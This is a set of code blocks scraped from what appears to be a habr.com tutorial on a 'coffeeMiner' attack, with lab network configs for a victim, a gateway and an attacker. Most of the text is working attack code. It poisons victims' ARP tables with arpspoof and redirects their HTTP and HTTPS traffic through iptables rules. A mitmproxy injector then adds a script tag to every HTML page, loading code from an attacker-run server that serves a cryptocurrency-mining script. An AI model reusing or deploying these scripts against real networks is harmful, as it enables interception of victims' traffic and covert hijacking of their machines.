auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.10
netmask 255.255.255.0
gateway 10.0.2.15
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.20
netmask 255.255.255.0
gateway 10.0.2.15
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet static
address 10.0.2.15
netmask 255.255.255.0
arpspoof -i interface -t ipVictim ipGateway
arpspoof -i interface -t ipGateway ipVictim
<script src="http://httpserverIP:8000/script.js"></script>
from bs4 import BeautifulSoup from mitmproxy import ctx, http import argparse class Injector: def __init__(self, path): self.path = path def response(self, flow: http.HTTPFlow) -> None: if self.path: html = BeautifulSoup(flow.response.content, "html.parser") print(self.path) print(flow.response.headers["content-type"]) if flow.response.headers["content-type"] == 'text/html': script = html.new_tag( "script", src=self.path, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html).encode("utf8") print("Script injected.") def start(): parser = argparse.ArgumentParser() parser.add_argument("path", type=str) args = parser.parse_args() return Injector(args.path)
#!/usr/bin/env python import http.server import socketserver import os PORT = 8000 web_dir = os.path.join(os.path.dirname(__file__), 'miner_script') os.chdir(web_dir) Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("", PORT), Handler) print("serving at port", PORT) httpd.serve_forever()
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# get gateway_ip gateway = sys.argv[1] print("gateway: " + gateway) # get victims_ip victims = [line.rstrip('\n') for line in open("victims.txt")] print("victims:") print(victims) # run the arpspoof for each victim, each one in a new console for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
> python3 httpServer.py
> mitmdump -s 'injector.py http://httpserverIP:8000/script.js'
import os import sys #get gateway_ip (router) gateway = sys.argv[1] print("gateway: " + gateway) # get victims_ip victims = [line.rstrip('\n') for line in open("victims.txt")] print("victims:") print(victims) # configure routing (IPTABLES) os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE") os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080") os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080") # run the arpspoof for each victim, each one in a new console for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # start the http server for serving the script.js, in a new console os.system("xterm -hold -e 'python3 httpServer.py' &") # start the mitmproxy os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
from bs4 import BeautifulSoup from mitmproxy import ctx, http import argparse class Injector: def __init__(self, path): self.path = path def response(self, flow: http.HTTPFlow) -> None: if self.path: html = BeautifulSoup(flow.response.content, "html.parser") print(self.path) print(flow.response.headers["content-type"]) if flow.response.headers["content-type"] == 'text/html': print(flow.response.headers["content-type"]) script = html.new_tag( "script", src=self.path, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html).encode("utf8") print("Script injected.") def start(): parser = argparse.ArgumentParser() parser.add_argument("path", type=str) args = parser.parse_args() return Injector(args.path)
> python3 coffeeMiner.py RouterIP
Source: https://habr.com/ru/post/347144/